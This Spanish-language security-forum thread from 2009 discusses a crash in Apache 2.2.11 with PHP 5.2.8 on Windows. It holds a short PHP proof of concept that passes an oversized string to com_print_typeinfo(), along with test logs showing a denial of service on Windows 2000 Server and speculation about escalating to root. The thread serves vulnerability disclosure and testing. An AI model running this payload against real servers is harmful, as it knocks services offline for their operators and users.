elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 05:48  


Tema destacado: Sigue las noticias más importantes de elhacker.net en ttwitter!

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow  (Leído 7,838 veces)
WHK
吴阿卡
Ex-Staff
*
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow
« en: 11 Enero 2009, 23:15 »
Hay una falla en apache 2.2.11 y php 5.2.8 donde puedes causar una denegación de servicio haciendo que el servidor deje de servir, hize pruebas con el xampp y cuando se cae el apache este me lo reinicia al instante, no se si con un servicio normal en linux sucede eso.

prueba:
Código
<?php
 $FTW = str_repeat("A",1992);
 com_print_typeinfo($FTW); 
?>

Fuente: http://packetstormsecurity.org/filedesc/com_print_typeinfo.txt.html
En línea
Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
AlbertoBSD
Estudiante y
Colaborador
***
Desconectado Desconectado

Mensajes: 1.955


Anonymous & Paranoid


Ver Perfil WWW
Re: Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow
« Respuesta #1 en: 12 Enero 2009, 01:40 »
Acabo de ejecutar portaudit y no me marca falla con PHP 5.2.8

Systema FreeBSD

Código
Anon@localhost % uname -a
FreeBSD  7.0-RELEASE FreeBSD 7.0-RELEASE #6: Sat Dec 27 08:13:05 CST 2008     root@:/usr/src/sys/i386/compile/VGN-N350  i386
 
PHP 5.2.8
Código
Anon@localhost % php -v
PHP 5.2.8 with Suhosin-Patch 0.9.6.3 (cli) (built: Dec 22 2008 20:08:26) 
Copyright (c) 1997-2008 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies

Versión de Apache 2.0.63

Código
Anon@localhost % apachectl -v
Server version: Apache/2.0.63
Server built:   Dec 14 2008 12:28:11
 

Error al llamar al archivo wtf.php
Código
Anon@localhost % tail -1 /var/log/httpd-error.log
[Sun Jan 11 18:31:53 2009] [error] [client 127.0.0.1] PHP Fatal error:  Call to undefined function com_print_typeinfo() in /usr/local/www/data/wtf.php on line 3, referer: http://localhost/
 

Pero el error esta en una funcion que al parecer yo no tengo, que extencio/modulo esta afectado ?

Saludos.
« Última modificación: 12 Enero 2009, 01:42 por Anon » En línea
Bien Super Divertido
@wifigdlmx
WHK
吴阿卡
Ex-Staff
*
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow
« Respuesta #2 en: 12 Enero 2009, 14:13 »
Yo uso apache 2.2.8 y php 5.2.6:



A la buelta del trabajo lo pruebo en linux.
En línea
Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
AlbertoBSD
Estudiante y
Colaborador
***
Desconectado Desconectado

Mensajes: 1.955


Anonymous & Paranoid


Ver Perfil WWW
Re: Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow
« Respuesta #3 en: 12 Enero 2009, 16:18 »
A mira, la falla parece ser de apache, lo tendre que instalar y configurar en otro puerto para probar esa version.

Saludos.
« Última modificación: 12 Enero 2009, 16:20 por Anon » En línea
Bien Super Divertido
@wifigdlmx
c1c4tr1z

Desconectado Desconectado

Mensajes: 27



Ver Perfil
Re: Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow
« Respuesta #4 en: 12 Enero 2009, 17:54 »
En GNU/Linux no funciona, porque la extensión COM de PHP esta solamente portada a Windows segun el sitio php.net.  :-\
En línea


AlbertoBSD
Estudiante y
Colaborador
***
Desconectado Desconectado

Mensajes: 1.955


Anonymous & Paranoid


Ver Perfil WWW
Re: Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow
« Respuesta #5 en: 12 Enero 2009, 21:14 »
Si ya lo hiba a comentar yo :http://www.php.net/manual/en/refs.utilspec.windows.php ya decia yo que ese error que me salio es muy raro.

Igualemente el que termina la ejecucion Inesperadamente es Apache.

Saludos.
En línea
Bien Super Divertido
@wifigdlmx
WHK
吴阿卡
Ex-Staff
*
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re
« Respuesta #6 en: 12 Enero 2009, 22:41 »
De todas formas la falla del apache es peligrosa porque significa que puedo cargar la extensión con cl() y llevar el overflow hasta el apache y tener los derechos de root
En línea
Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
c1c4tr1z

Desconectado Desconectado

Mensajes: 27



Ver Perfil
Re: Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow
« Respuesta #7 en: 12 Enero 2009, 23:30 »
Pero sera verdaderamente un Buffer Overflow? O un simple Denial of Service?
Yo no tengo la posibilidad de comprobarlo porque no tengo una maquina con XAMPP. Pero si alguien lo tiene, podria probarlo con OllyDbg  ;D
En línea


berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.140



Ver Perfil
Re: Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow
« Respuesta #8 en: 13 Enero 2009, 09:25 »
Código:
<?php
 $FTW = str_repeat("A",1992);
 com_print_typeinfo($FTW);

##
## --------------------------
## Proof Of Concept by berz3k
## elhacker.net 01.13.009
## --------------------------
##
## Apache/2.2.9 (Win32) / PHP/5.2.6 / Windows vista
## Apache/2.2.11 (Win32) / PHP/5.2.8 / Windows Vista
## Apache/2.2.11 (Win32) / PHP/5.2.8 / Windows 2000 Server
##
##
## NOTA: En los casos de Windows vista, es necesaria la interaccion del Admin
## "Cerrar Programa" y aun asi el server NO "crashea".
##
## Sobre Windows 2000 Server el DoS (Denial Of Service) fue exitoso, aun no se
## aplica debug para observar en que parte de la memoria sera posible escribir
## datos...de momento el DoS es posible en wi2k server, seguiremos haciendo mas
## pruebas sobre Linux/Unix.
##
##
##
## -------------
## Windows vista
## -------------
## C:\>php -v
## PHP 5.2.6 (cli) (built: May  2 2008 18:02:07)
## Copyright (c) 1997-2008 The PHP Group
## Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies
##
## C:\>nc localhost 80
## HEAD / HTTP/1.0
##
## HTTP/1.1 302 Found
## Date: Tue, 13 Jan 2009 07:14:19 GMT
## Server: Apache/2.2.9 (Win32) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.6
## X-Powered-By: PHP/5.2.6
## Location: http:///xampp/
## Connection: close
## Content-Type: text/html
##
## -------------
## Windows vista
## -------------
## C:\>php -v
## PHP 5.2.6 (cli) (built: May  2 2008 18:02:07)
## Copyright (c) 1997-2008 The PHP Group
## Zend Engine v2.2.0, Copyright (c) 1998-2008 Zend Technologies
##
##
## C:\>nc localhost 80
## HEAD / HTTP/1.0
##
## HTTP/1.1 302 Found
## Date: Tue, 13 Jan 2009 07:22:48 GMT
## Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
## X-Powered-By: PHP/5.2.8
## Location: http:///xampp/
## Connection: close
## Content-Type: text/html
##
## -------------
## Win2k Server
## -------------
## C:\>nc localhost 80
## HEAD / HTP/1.0
##
## HTTP/1.1 302 Found
## Date: Tue, 13 Jan 2009 07:53:11 GMT
## Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8
## X-Powered-By: PHP/5.2.8
## Location: http:///xampp/
## Connection: close
## Content-Type: text/html
##
##
##
##
##

?>



Apache/2.2.9 (Win32) / PHP/5.2.6 Windows Vista



Apache/2.2.11 (Win32) / PHP/5.2.6 Windows Vista



Apache/2.2.11 (Win32) / PHP/5.2.6 Windows 2000 Server DoS r0x




-berz3k.


En línea
WHK
吴阿卡
Ex-Staff
*
Desconectado Desconectado

Mensajes: 4.113


The Hacktivism is not a crime


Ver Perfil WWW
Re: Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow
« Respuesta #9 en: 14 Enero 2009, 02:47 »
Pero que pasaría si crearas tu propia librería .so y la cargaras con cl() ? en sitios de hosting gratuitos podrías llegar a tener derechos de root? o simplemente te dejaría en www-data?
En línea
Mi foro Ultra Off-Topics: http://whk.drawcoders.com/foro/

Gracias a todos! Good bye!
c1c4tr1z

Desconectado Desconectado

Mensajes: 27



Ver Perfil
Re: Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow
« Respuesta #10 en: 14 Enero 2009, 03:20 »
En si, si fuera un buffer overflow real se podría inyectar código pero como el usuario que corre apache (con el que esta especificado en el http.conf o apache2.conf) que casi siempre tiene privilegios de "nobody".
En línea


AlbertoBSD
Estudiante y
Colaborador
***
Desconectado Desconectado

Mensajes: 1.955


Anonymous & Paranoid


Ver Perfil WWW
Re: Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow
« Respuesta #11 en: 15 Enero 2009, 05:10 »
Generalmente es www igualmente se puede configurar para que sea con otro usuario.

Código
Anon@localhost % ps aux | grep httpd
www      1402  0.0  0.6 10820  6292  ??  I     7:08PM   0:00.00 /usr/local/sbin/httpd
 

Estoy por instalar windows en unos días mas y ahora si me pongo a ver bien, las fallas bajo windows.

Saludos.
En línea
Bien Super Divertido
@wifigdlmx
berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.140



Ver Perfil
Re: Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow
« Respuesta #12 en: 21 Enero 2009, 01:54 »
He intentado algunas cosillas para win32 sobre este bug, mmmm todo me da DoS, si alguien mas podria compartir sus notes seria bueno....

-berz3k.


En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines